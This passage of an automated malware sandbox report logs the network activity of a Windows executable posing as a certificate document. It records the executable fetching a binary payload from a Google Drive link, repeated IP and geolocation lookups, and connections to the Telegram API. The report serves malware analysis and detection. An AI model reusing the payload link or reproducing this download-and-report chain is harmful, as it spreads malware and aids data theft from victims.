                                                                                                                        Nov 11, 2024 15:28:21.416408062 CET44349998188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:21.417624950 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:21.417624950 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:21.448184967 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.449222088 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.453449011 CET8049997132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:21.453501940 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.453990936 CET8049999132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:21.454070091 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.454174042 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.458914995 CET8049999132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.194943905 CET8049999132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.196688890 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.196739912 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.196820974 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.197176933 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.197200060 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.240212917 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.643419981 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.645201921 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.645226955 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.775810957 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.775876045 CET44350000188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.775949955 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.779484034 CET50000443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:22.817414045 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.817487001 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.822283983 CET8050001132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.822379112 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.822489977 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.822597027 CET8049999132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:22.822659016 CET4999980192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:22.827471972 CET8050001132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:23.643192053 CET8050001132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:23.644669056 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:23.644706964 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:23.644972086 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:23.645268917 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:23.645282984 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:23.693347931 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:24.076561928 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.078440905 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:24.078469038 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.188016891 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.188070059 CET44350002188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.188174963 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:24.188816071 CET50002443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:24.341389894 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:24.346638918 CET8050001132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.346693993 CET5000180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:24.348849058 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.348885059 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.348965883 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.349387884 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.349400043 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.943068027 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.943197966 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.945399046 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.945411921 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.945657969 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.947077036 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:24.991328001 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:25.135967970 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:25.136030912 CET44350003149.154.167.220192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:25.136090040 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:25.140192986 CET50003443192.168.2.6149.154.167.220
                                                                                                                        Nov 11, 2024 15:28:30.822431087 CET4998880192.168.2.6132.226.8.169
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 11, 2024 15:28:03.602547884 CET6020153192.168.2.61.1.1.1
                                                                                                                        Nov 11, 2024 15:28:03.609339952 CET53602011.1.1.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.581496000 CET6267153192.168.2.61.1.1.1
                                                                                                                        Nov 11, 2024 15:28:04.588355064 CET53626711.1.1.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:09.679183006 CET5646453192.168.2.61.1.1.1
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET53564641.1.1.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.085688114 CET6519353192.168.2.61.1.1.1
                                                                                                                        Nov 11, 2024 15:28:12.093413115 CET53651931.1.1.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:24.341294050 CET5300753192.168.2.61.1.1.1
                                                                                                                        Nov 11, 2024 15:28:24.348263979 CET53530071.1.1.1192.168.2.6
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Nov 11, 2024 15:28:03.602547884 CET192.168.2.61.1.1.10xd5d2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:04.581496000 CET192.168.2.61.1.1.10x8a08Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.679183006 CET192.168.2.61.1.1.10x6719Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:12.085688114 CET192.168.2.61.1.1.10x45f5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:24.341294050 CET192.168.2.61.1.1.10x3746Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 11, 2024 15:28:03.609339952 CET1.1.1.1192.168.2.60xd5d2No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:04.588355064 CET1.1.1.1192.168.2.60x8a08No error (0)drive.usercontent.google.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:09.686270952 CET1.1.1.1192.168.2.60x6719No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:12.093413115 CET1.1.1.1192.168.2.60x45f5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:12.093413115 CET1.1.1.1192.168.2.60x45f5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                        Nov 11, 2024 15:28:24.348263979 CET1.1.1.1192.168.2.60x3746No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                        • drive.google.com
                                                                                                                        • drive.usercontent.google.com
                                                                                                                        • reallyfreegeoip.org
                                                                                                                        • api.telegram.org
                                                                                                                        • checkip.dyndns.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.649985132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:09.704408884 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:11.421066046 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:11 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                                                                                        Nov 11, 2024 15:28:11.444967985 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Nov 11, 2024 15:28:11.708616018 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:11 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                                                                                        Nov 11, 2024 15:28:12.791001081 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Nov 11, 2024 15:28:13.031377077 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:12 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.649988132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:13.621459007 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Nov 11, 2024 15:28:14.998121023 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:14 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.649991132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:15.580898046 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:16.682430983 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:16 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.649993132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:17.261389971 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:18.012852907 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:17 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.649995132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:18.852266073 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:19.558464050 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:19 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.649997132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:20.129791975 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:20.849217892 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:20 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.649999132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:21.454174042 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:22.194943905 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:22 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.650001132.226.8.169802308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 11, 2024 15:28:22.822489977 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Nov 11, 2024 15:28:23.643192053 CET274INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 105
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.649983142.250.186.464432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:04 UTC216OUTGET /uc?export=download&id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                        Host: drive.google.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2024-11-11 14:28:04 UTC1766INHTTP/1.1 303 See Other
                                                                                                                        Content-Type: application/binary
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:04 GMT
                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO&export=download
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Content-Security-Policy: script-src 'nonce-VzdmePFq6lbHtjO4fXja1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                        Server: ESF
                                                                                                                        Content-Length: 0
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.649984172.217.18.14432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:05 UTC258OUTGET /download?id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO&export=download HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-11 14:28:07 UTC4919INHTTP/1.1 200 OK
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Disposition: attachment; filename="KPIPGfOGUqm24.bin"
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Allow-Credentials: false
